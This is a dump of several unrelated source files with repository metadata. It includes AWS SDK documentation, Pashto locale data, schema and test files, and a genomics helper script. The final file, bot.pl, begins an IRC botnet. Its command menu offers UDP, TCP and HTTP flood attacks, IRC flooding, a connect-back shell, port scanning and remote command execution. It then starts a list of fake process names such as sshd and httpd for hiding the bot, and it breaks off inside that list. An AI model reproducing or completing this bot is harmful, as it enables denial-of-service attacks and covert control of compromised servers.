built-in security group with a layer on creation; custom security
groups are required only for those layers that need custom settings.
=back
For more information, see Create a New Stack
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-creating.html).
=head2 VpcId => Str
The ID of the VPC that the cloned stack is to be launched into. It must
be in the specified region. All instances are launched into this VPC,
and you cannot change the ID later.
=over
=item *
If your account supports EC2 Classic, the default value is no VPC.
=item *
If your account does not support EC2 Classic, the default value is the
default VPC for the specified region.
=back
If the VPC ID corresponds to a default VPC and you have specified
either the C<DefaultAvailabilityZone> or the C<DefaultSubnetId>
parameter only, AWS OpsWorks Stacks infers the value of the other
parameter. If you specify neither parameter, AWS OpsWorks Stacks sets
these parameters to the first valid Availability Zone for the specified
region and the corresponding default VPC subnet ID, respectively.
If you specify a nondefault VPC ID, note the following:
=over
=item *
It must belong to a VPC in your account that is in the specified
region.
=item *
You must specify a value for C<DefaultSubnetId>.
=back
For more information about how to use AWS OpsWorks Stacks with a VPC,
see Running a Stack in a VPC
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-vpc.html).
For more information about default VPC and EC2 Classic, see Supported
Platforms
(https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-supported-platforms.html).
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method CloneStack in L<Paws::OpsWorks>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| 31.201183 | 249 | 0.722738 |
eda24e143bd738ad27b382c053b09b29f5015209 | 10,022 | pl | Perl | perl/vendor/lib/auto/share/dist/DateTime-Locale/ps-PK.pl | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/auto/share/dist/DateTime-Locale/ps-PK.pl | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | 3 | 2021-01-27T10:09:28.000Z | 2021-05-11T21:20:12.000Z | perl/vendor/lib/auto/share/dist/DateTime-Locale/ps-PK.pl | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | {
am_pm_abbreviated => [
"\N{U+063a}.\N{U+0645}.",
"\N{U+063a}.\N{U+0648}.",
],
available_formats => {
Bh => "h B",
Bhm => "h:mm B",
Bhms => "h:mm:ss B",
E => "ccc",
EBhm => "E h:mm B",
EBhms => "E h:mm:ss B",
EHm => "E HH:mm",
EHms => "E HH:mm:ss",
Ed => "d, E",
Ehm => "E h:mm a",
Ehms => "E h:mm:ss a",
Gy => "G y",
GyMMM => "G y MMM",
GyMMMEd => "G y MMM d, E",
GyMMMd => "G y MMM d",
H => "HH",
Hm => "HH:mm",
Hms => "HH:mm:ss",
Hmsv => "HH:mm:ss v",
Hmv => "HH:mm v",
M => "L",
MEd => "MM-dd, E",
MMM => "LLL",
MMMEd => "E, MMM d",
"MMMMW-count-one" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}\N{U+2018} W \N{U+062f} MMMM\N{U+2018}",
"MMMMW-count-other" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd} W \N{U+062f} MMMM",
MMMMd => "MMMM d",
MMMd => "MMM d",
Md => "MM-dd",
d => "d",
h => "h a",
hm => "h:mm a",
hms => "h:mm:ss a",
hmsv => "h:mm:ss a v",
hmv => "h:mm a v",
ms => "mm:ss",
y => "y",
yM => "y-MM",
yMEd => "y-MM-dd, E",
yMMM => "y MMM",
yMMMEd => "y MMM d, E",
yMMMM => "y MMMM",
yMMMd => "y MMM d",
yMd => "y-MM-dd",
yQQQ => "y QQQ",
yQQQQ => "y QQQQ",
"yw-count-one" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd} w \N{U+062f} Y",
"yw-count-other" => "\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd} w \N{U+062f} Y",
},
code => "ps-PK",
date_format_full => "EEEE \N{U+062f} y \N{U+062f} MMMM d",
date_format_long => "\N{U+062f} y \N{U+062f} MMMM d",
date_format_medium => "y MMM d",
date_format_short => "y/M/d",
datetime_format_full => "{1} {0}",
datetime_format_long => "{1} {0}",
datetime_format_medium => "{1} {0}",
datetime_format_short => "{1} {0}",
day_format_abbreviated => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
day_format_narrow => [
"M",
"T",
"W",
"T",
"F",
"S",
"S",
],
day_format_wide => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
day_stand_alone_abbreviated => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
day_stand_alone_narrow => [
"M",
"T",
"W",
"T",
"F",
"S",
"S",
],
day_stand_alone_wide => [
"\N{U+062f}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+062f}\N{U+0631}\N{U+06d0}\N{U+0646}\N{U+06cd}",
"\N{U+0685}\N{U+0644}\N{U+0631}\N{U+0646}\N{U+06cd}",
"\N{U+067e}\N{U+064a}\N{U+0646}\N{U+0681}\N{U+0646}\N{U+06cd}",
"\N{U+062c}\N{U+0645}\N{U+0639}\N{U+0647}",
"\N{U+0627}\N{U+0648}\N{U+0646}\N{U+06cd}",
"\N{U+064a}\N{U+0648}\N{U+0646}\N{U+06cd}",
],
era_abbreviated => [
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0648}\N{U+0693}\N{U+0627}\N{U+0646}\N{U+062f}\N{U+06d0}",
"\N{U+0645}.",
],
era_narrow => [
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0648}\N{U+0693}\N{U+0627}\N{U+0646}\N{U+062f}\N{U+06d0}",
"\N{U+0645}.",
],
era_wide => [
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0685}\N{U+062e}\N{U+0647} \N{U+0648}\N{U+0693}\N{U+0627}\N{U+0646}\N{U+062f}\N{U+06d0}",
"\N{U+0644}\N{U+0647} \N{U+0645}\N{U+06cc}\N{U+0644}\N{U+0627}\N{U+062f} \N{U+0685}\N{U+062e}\N{U+0647} \N{U+0648}\N{U+0631}\N{U+0648}\N{U+0633}\N{U+062a}\N{U+0647}",
],
first_day_of_week => 7,
glibc_date_1_format => "%a %b %e %H:%M:%S %Z %Y",
glibc_date_format => "%m/%d/%y",
glibc_datetime_format => "%a %b %e %H:%M:%S %Y",
glibc_time_12_format => "%I:%M:%S %p",
glibc_time_format => "%H:%M:%S",
language => "Pashto",
month_format_abbreviated => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+06d0}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
month_format_narrow => [
"\N{U+062c}",
"\N{U+0641}",
"\N{U+0645}",
"\N{U+0627}",
"\N{U+0645}",
"\N{U+062c}",
"\N{U+062c}",
"\N{U+0627}",
"\N{U+0633}",
"\N{U+0627}",
"\N{U+0646}",
"\N{U+062f}",
],
month_format_wide => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+06d0}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
month_stand_alone_abbreviated => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
month_stand_alone_narrow => [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
],
month_stand_alone_wide => [
"\N{U+062c}\N{U+0646}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0641}\N{U+06d0}\N{U+0628}\N{U+0631}\N{U+0648}\N{U+0631}\N{U+064a}",
"\N{U+0645}\N{U+0627}\N{U+0631}\N{U+0686}",
"\N{U+0627}\N{U+067e}\N{U+0631}\N{U+06cc}\N{U+0644}",
"\N{U+0645}\N{U+06cd}",
"\N{U+062c}\N{U+0648}\N{U+0646}",
"\N{U+062c}\N{U+0648}\N{U+0644}\N{U+0627}\N{U+06cc}",
"\N{U+0627}\N{U+06ab}\N{U+0633}\N{U+062a}",
"\N{U+0633}\N{U+067e}\N{U+062a}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+0627}\N{U+06a9}\N{U+062a}\N{U+0648}\N{U+0628}\N{U+0631}",
"\N{U+0646}\N{U+0648}\N{U+0645}\N{U+0628}\N{U+0631}",
"\N{U+062f}\N{U+0633}\N{U+0645}\N{U+0628}\N{U+0631}",
],
name => "Pashto Pakistan",
native_language => "\N{U+067e}\N{U+069a}\N{U+062a}\N{U+0648}",
native_name => "\N{U+067e}\N{U+069a}\N{U+062a}\N{U+0648} \N{U+067e}\N{U+0627}\N{U+06a9}\N{U+0633}\N{U+062a}\N{U+0627}\N{U+0646}",
native_script => undef,
native_territory => "\N{U+067e}\N{U+0627}\N{U+06a9}\N{U+0633}\N{U+062a}\N{U+0627}\N{U+0646}",
native_variant => undef,
quarter_format_abbreviated => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
quarter_format_narrow => [
1,
2,
3,
4,
],
quarter_format_wide => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
quarter_stand_alone_abbreviated => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
quarter_stand_alone_narrow => [
1,
2,
3,
4,
],
quarter_stand_alone_wide => [
"\N{U+0644}\N{U+0648}\N{U+0645}\N{U+0693}\N{U+06cd} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f2}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f3}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
"\N{U+06f4}\N{U+0645}\N{U+0647} \N{U+0631}\N{U+0628}\N{U+0639}\N{U+0647}",
],
script => undef,
territory => "Pakistan",
time_format_full => "h:mm:ss a zzzz",
time_format_long => "h:mm:ss a z",
time_format_medium => "h:mm:ss a",
time_format_short => "h:mm a",
variant => undef,
version => 36,
}
| 36.710623 | 170 | 0.507982 |
ed9b3acd980960dc90adba21a76f3f838ec72a9c | 554 | ph | Perl | usr/local/lib/perl5/site_perl/mach/5.20/base64.ph | skarekrow/testrepo | af979b718aae49a2301c400964a603cf010a3c51 | [
"BSD-3-Clause"
] | null | null | null | usr/local/lib/perl5/site_perl/mach/5.20/base64.ph | skarekrow/testrepo | af979b718aae49a2301c400964a603cf010a3c51 | [
"BSD-3-Clause"
] | null | null | null | usr/local/lib/perl5/site_perl/mach/5.20/base64.ph | skarekrow/testrepo | af979b718aae49a2301c400964a603cf010a3c51 | [
"BSD-3-Clause"
] | null | null | null | require '_h2ph_pre.ph';
no warnings qw(redefine misc);
unless(defined(&_BASE64_H_)) {
eval 'sub _BASE64_H_ () {1;}' unless defined(&_BASE64_H_);
unless(defined(&ROKEN_LIB_FUNCTION)) {
if(defined(&_WIN32)) {
eval 'sub ROKEN_LIB_FUNCTION () {1;}' unless defined(&ROKEN_LIB_FUNCTION);
eval 'sub ROKEN_LIB_CALL () { &__cdecl;}' unless defined(&ROKEN_LIB_CALL);
} else {
eval 'sub ROKEN_LIB_FUNCTION () {1;}' unless defined(&ROKEN_LIB_FUNCTION);
eval 'sub ROKEN_LIB_CALL () {1;}' unless defined(&ROKEN_LIB_CALL);
}
}
}
1;
| 30.777778 | 79 | 0.676895 |
edb6b6ae7eff917d15a1ad210aebc96262464f13 | 295 | t | Perl | App-Catable/t/04-notify.t | shlomif/catable | 2f656d7d9296f42d3a9d68dec85ddebdd786ebd9 | [
"MIT"
] | 6 | 2015-04-09T11:04:56.000Z | 2020-09-24T22:05:52.000Z | App-Catable/t/04-notify.t | shlomif/catable | 2f656d7d9296f42d3a9d68dec85ddebdd786ebd9 | [
"MIT"
] | null | null | null | App-Catable/t/04-notify.t | shlomif/catable | 2f656d7d9296f42d3a9d68dec85ddebdd786ebd9 | [
"MIT"
] | null | null | null | #!/usr/bin/perl
use strict;
use warnings;
use Test::More qw(no_plan);
use lib 't/lib/for-notify';
use Test::WWW::Mechanize::Catalyst;
my $mech = Test::WWW::Mechanize::Catalyst->new(catalyst_app => 'App::Catable');
$mech->get_ok('/notify/hello_world');
$mech->content_contains('Hello, world!');
| 26.818182 | 79 | 0.705085 |
ed988de2b856f606966cb13a7eda2eb2884071b7 | 2,661 | pm | Perl | traffic_ops/app/lib/Schema/Result/Hwinfo.pm | ninetian/traffic_control | 11c7787624bde3206df916c1190a78a1e9bda8e1 | [
"Apache-2.0"
] | null | null | null | traffic_ops/app/lib/Schema/Result/Hwinfo.pm | ninetian/traffic_control | 11c7787624bde3206df916c1190a78a1e9bda8e1 | [
"Apache-2.0"
] | null | null | null | traffic_ops/app/lib/Schema/Result/Hwinfo.pm | ninetian/traffic_control | 11c7787624bde3206df916c1190a78a1e9bda8e1 | [
"Apache-2.0"
] | 1 | 2020-09-14T00:18:22.000Z | 2020-09-14T00:18:22.000Z | use utf8;
#
# Copyright 2015 Comcast Cable Communications Management, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
#
package Schema::Result::Hwinfo;
# Created by DBIx::Class::Schema::Loader
# DO NOT MODIFY THE FIRST PART OF THIS FILE
=head1 NAME
Schema::Result::Hwinfo
=cut
use strict;
use warnings;
use base 'DBIx::Class::Core';
=head1 TABLE: C<hwinfo>
=cut
__PACKAGE__->table("hwinfo");
=head1 ACCESSORS
=head2 id
data_type: 'integer'
is_auto_increment: 1
is_nullable: 0
=head2 serverid
data_type: 'integer'
is_foreign_key: 1
is_nullable: 0
=head2 description
data_type: 'varchar'
is_nullable: 0
size: 256
=head2 val
data_type: 'varchar'
is_nullable: 0
size: 256
=head2 last_updated
data_type: 'timestamp'
datetime_undef_if_invalid: 1
default_value: current_timestamp
is_nullable: 1
=cut
__PACKAGE__->add_columns(
"id",
{ data_type => "integer", is_auto_increment => 1, is_nullable => 0 },
"serverid",
{ data_type => "integer", is_foreign_key => 1, is_nullable => 0 },
"description",
{ data_type => "varchar", is_nullable => 0, size => 256 },
"val",
{ data_type => "varchar", is_nullable => 0, size => 256 },
"last_updated",
{
data_type => "timestamp",
datetime_undef_if_invalid => 1,
default_value => \"current_timestamp",
is_nullable => 1,
},
);
=head1 PRIMARY KEY
=over 4
=item * L</id>
=back
=cut
__PACKAGE__->set_primary_key("id");
=head1 UNIQUE CONSTRAINTS
=head2 C<serverid>
=over 4
=item * L</serverid>
=item * L</description>
=back
=cut
__PACKAGE__->add_unique_constraint("serverid", ["serverid", "description"]);
=head1 RELATIONS
=head2 serverid
Type: belongs_to
Related object: L<Schema::Result::Server>
=cut
__PACKAGE__->belongs_to(
"serverid",
"Schema::Result::Server",
{ id => "serverid" },
{ is_deferrable => 1, on_delete => "CASCADE", on_update => "NO ACTION" },
);
# Created by DBIx::Class::Schema::Loader v0.07038 @ 2014-01-02 16:19:05
# DO NOT MODIFY THIS OR ANYTHING ABOVE! md5sum:2ZWljDE7ZOQJ+UH0lY2jBg
# You can replace this text with custom code or comments, and it will be preserved on regeneration
1;
| 18.226027 | 98 | 0.701616 |
ed1aedda7951be0590c6dd52c3b3f286d7265c8d | 4,148 | t | Perl | t/pl.t | patch/lingua-stem-patch-pm5 | 602c366e8bb64f25d481b6f5ca8bcdd1204cc88a | [
"Artistic-1.0"
] | null | null | null | t/pl.t | patch/lingua-stem-patch-pm5 | 602c366e8bb64f25d481b6f5ca8bcdd1204cc88a | [
"Artistic-1.0"
] | 1 | 2017-04-25T15:30:41.000Z | 2017-04-25T15:30:41.000Z | t/pl.t | patch/lingua-stem-patch-pm5 | 602c366e8bb64f25d481b6f5ca8bcdd1204cc88a | [
"Artistic-1.0"
] | null | null | null | use utf8;
use strict;
use warnings;
use open qw( :encoding(UTF-8) :std );
use Test::More tests => 77;
use Lingua::Stem::Patch::PL qw( stem );
# nouns
is stem('gazetach'), 'gaze', 'remove -tach';
is stem('sytuacja'), 'syt', 'remove -acja';
is stem('sytuacją'), 'syt', 'remove -acją';
is stem('sytuacji'), 'syt', 'remove -acji';
is stem('kochanie'), 'koch', 'remove -anie';
is stem('ubraniu'), 'ubr', 'remove -aniu';
is stem('tłumaczenie'), 'tłumacz', 'remove -enie';
is stem('imieniu'), 'imi', 'remove -eniu';
is stem('spotyka'), 'spot', 'remove -ka from -tyka';
is stem('latach'), 'lat', 'remove -ach';
is stem('czasami'), 'czas', 'remove -ami';
is stem('miejsce'), 'miejs', 'remove -ce';
is stem('świata'), 'świ', 'remove -ta';
is stem('pojęcia'), 'poj', 'remove -cia';
is stem('pięciu'), 'pię', 'remove -ciu';
is stem('zobaczenia'), 'zobacze', 'remove -nia';
is stem('tygodniu'), 'tygod', 'remove -niu';
is stem('policja'), 'polic', 'remove -ja from -cja';
is stem('policją'), 'polic', 'remove -ją from -cją';
is stem('policji'), 'polic', 'remove -ji from -cji';
# diminutive
is stem('ptaszek'), 'pt', 'remove -aszek';
is stem('tyłeczek'), 'tył', 'remove -eczek';
is stem('policzek'), 'pol', 'remove -iczek';
is stem('kieliszek'), 'kiel', 'remove -iszek';
is stem('staruszek'), 'star', 'remove -uszek';
is stem('olejek'), 'olej', 'remove -ek from -ejek';
is stem('piosenek'), 'piosen', 'remove -ek from -enek';
is stem('derek'), 'der', 'remove -ek from -erek';
is stem('jednak'), 'jedn', 'remove -ak';
is stem('wypadek'), 'wypad', 'remove -ek';
# adjectives
is stem('najlepsze'), 'lep', 'remove naj- and -sze';
is stem('najlepszy'), 'lep', 'remove naj- and -szy';
is stem('najlepszych'), 'lep', 'remove naj- and -szych';
is stem('grzeczny'), 'grze', 'remove -czny';
is stem('dlaczego'), 'dlacz', 'remove -ego';
is stem('więcej'), 'więc', 'remove -ej';
is stem('żadnych'), 'żadn', 'remove -ych';
is stem('gotowa'), 'got', 'remove -owa';
is stem('gotowe'), 'got', 'remove -owe';
is stem('gotowy'), 'got', 'remove -owy';
# verbs
is stem('gdybym'), 'gdy', 'remove -bym';
is stem('oczywiście'), 'oczywiś', 'remove -cie';
is stem('miałem'), 'mia', 'remove -łem';
is stem('spotkamy'), 'spotk', 'remove -amy';
is stem('możemy'), 'moż', 'remove -emy';
is stem('pamiętasz'), 'pamięt', 'remove -asz';
is stem('chcesz'), 'chc', 'remove -esz';
is stem('ukraść'), 'ukr', 'remove -aść';
is stem('znieść'), 'zni', 'remove -eść';
is stem('mówiąc'), 'mów', 'remove -ąc';
is stem('zostać'), 'zost', 'remove -ać';
is stem('przepraszam'), 'przeprasz', 'remove -am';
is stem('miał'), 'mi', 'remove -ał';
is stem('mieć'), 'mi', 'remove -eć';
is stem('jestem'), 'jest', 'remove -em';
is stem('zrobić'), 'zrob', 'remove -ić';
is stem('zrobił'), 'zrob', 'remove -ił';
is stem('kraj'), 'kra', 'remove -j from -aj';
is stem('masz'), 'ma', 'remove -sz from -asz';
is stem('wpaść'), 'wpa', 'remove -ść from -aść';
is stem('wiesz'), 'wie', 'remove -sz from -esz';
is stem('cześć'), 'cze', 'remove -ść from -eść';
# adverbs
is stem('dobrze'), 'dobr', 'remove -ze from -rze';
is stem('panie'), 'pan', 'remove -ie from -nie';
is stem('prawie'), 'praw', 'remove -ie from -wie';
# plural
is stem('czasami'), 'czas', 'remove -ami';
is stem('poziom'), 'poz', 'remove -om';
is stem('dolarów'), 'dolar', 'remove -ów';
# others
is stem('dobra'), 'dobr', 'remove -a';
is stem('swoją'), 'swoj', 'remove -ą';
is stem('proszę'), 'prosz', 'remove -ę';
is stem('jeśli'), 'jeśl', 'remove -i';
is stem('pomysł'), 'pomys', 'remove -ł';
is stem('porządku'), 'porządk', 'remove -u';
is stem('kiedy'), 'kied', 'remove -y';
is stem('życia'), 'życ', 'remove -ia';
is stem('gdzie'), 'gdz', 'remove -ie';
| 42.326531 | 60 | 0.534957 |
ed00fb763d173a7f452f683039e4e4cd9aa4fef9 | 641 | pl | Perl | CSAR_utils/split_coverage_by_chrom.pl | GregoryLab/structure | ee7713127bf4be5230f0a4f37a4b238b33861390 | [
"Unlicense"
] | null | null | null | CSAR_utils/split_coverage_by_chrom.pl | GregoryLab/structure | ee7713127bf4be5230f0a4f37a4b238b33861390 | [
"Unlicense"
] | null | null | null | CSAR_utils/split_coverage_by_chrom.pl | GregoryLab/structure | ee7713127bf4be5230f0a4f37a4b238b33861390 | [
"Unlicense"
] | null | null | null | #!/usr/bin/perl -w
use strict;
# split a 3-column input BED file of (coverage) values by chromosome
my $usage = "Usage: perl $0 fn out_prefix";
my $infile = shift or die $usage;
my $outprefix= shift or die $usage;
open(IN, "<$infile") || die "Unable to open $infile: $!";
my $current_chrom = "";
while (my $line = <IN>) {
chomp $line;
my ($chrom, $pos, $value) = split(/\t/, $line);
if ($chrom ne $current_chrom) {
# open a new file
if ($current_chrom ne "") {
close(OUT);
}
open(OUT, ">$outprefix.$chrom.coverage.txt") || die "Unable to write to: $!";
$current_chrom = $chrom;
}
printf OUT "$value\n";
}
close(OUT);
| 22.103448 | 79 | 0.617785 |
edad5db5f03a502204e7556f4b402946e8ce57e9 | 163 | t | Perl | tests/unit/default/syntax-error/077-create-table-dot-column-after.x.t | Vovan-VE/lazymgen | 7968a1e9c24966eb38cab1e1f8d5b77f5bc6669b | [
"MIT"
] | null | null | null | tests/unit/default/syntax-error/077-create-table-dot-column-after.x.t | Vovan-VE/lazymgen | 7968a1e9c24966eb38cab1e1f8d5b77f5bc6669b | [
"MIT"
] | null | null | null | tests/unit/default/syntax-error/077-create-table-dot-column-after.x.t | Vovan-VE/lazymgen | 7968a1e9c24966eb38cab1e1f8d5b77f5bc6669b | [
"MIT"
] | null | null | null | ---- IN ----
+%table.name:int>|
---- OUT ----
---- ERR ----
syntax: expected <name> after `+%table.name:int>` near `|` at position 17 - at line 1
---- EXIT ----
1
| 20.375 | 85 | 0.509202 |
ed4803cb0ae23b8624215ec427cbb1d12bff14f4 | 44,469 | pl | Perl | SenpaiIRC/bot.pl | 1Dragos12/arhive | 46dd676e3f9ebb1879a12b899a335ca7f5c1b8c6 | [
"MIT"
] | null | null | null | SenpaiIRC/bot.pl | 1Dragos12/arhive | 46dd676e3f9ebb1879a12b899a335ca7f5c1b8c6 | [
"MIT"
] | null | null | null | SenpaiIRC/bot.pl | 1Dragos12/arhive | 46dd676e3f9ebb1879a12b899a335ca7f5c1b8c6 | [
"MIT"
] | null | null | null | #!/usr/bin/perl
######################################################################################################################
## [ Channel ] #################### [ Flood Attack ] ########################### [ Utils ] ###########################
######################################################################################################################
## !u @join <#channel> ## !u @udp1 <ip> <port> <time> ## !u @cback <ip> <port> ##
## !u @part <#channel> ## !u @udp2 <ip> <packet size> <time> ## !u @downlod <url+path> <file> ##
## !u !uejoin <#channel> ## !u @udp3 <ip> <port> <time> ## !u @portscan <ip> ##
## !u !op <channel> <nick> ## !u @tcp <ip> <port> <packet size> <time> ## !u @mail <subject> <sender> ##
## !u !deop <channel> <nick> ## !u @http <site> <time> ## <recipient> <message> ##
## !u !voice <channel> <nick> ## ## !u pwd;uname -a;id <for example> ##
## !u !devoice <channel> <nick> ## !u @ctcpflood <nick> ## !u @port <ip> <port> ##
## !u !nick <newnick> ## !u @msgflood <nick> ## !u @dns <ip/host> ##
## !u !msg <nick> ## !u @noticeflood <nick> ## ##
## !u !quit ## ## ##
## !u !uaw ## ## ##
## !u @die ## ## ##
## ## ## ##
######################################################################################################################
######################################################################################################################
#############################
##### [ Configuration ] #####
#############################
my @rps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"/usr/sbin/sshd -i",
"/usr/sbin/sshd",
"/usr/sbin/sshd -D",
"/usr/sbin/apache2 -k start",
"/sbin/syslogd",
"/sbin/klogd -c 1 -x -x",
"/usr/sbin/acpid",
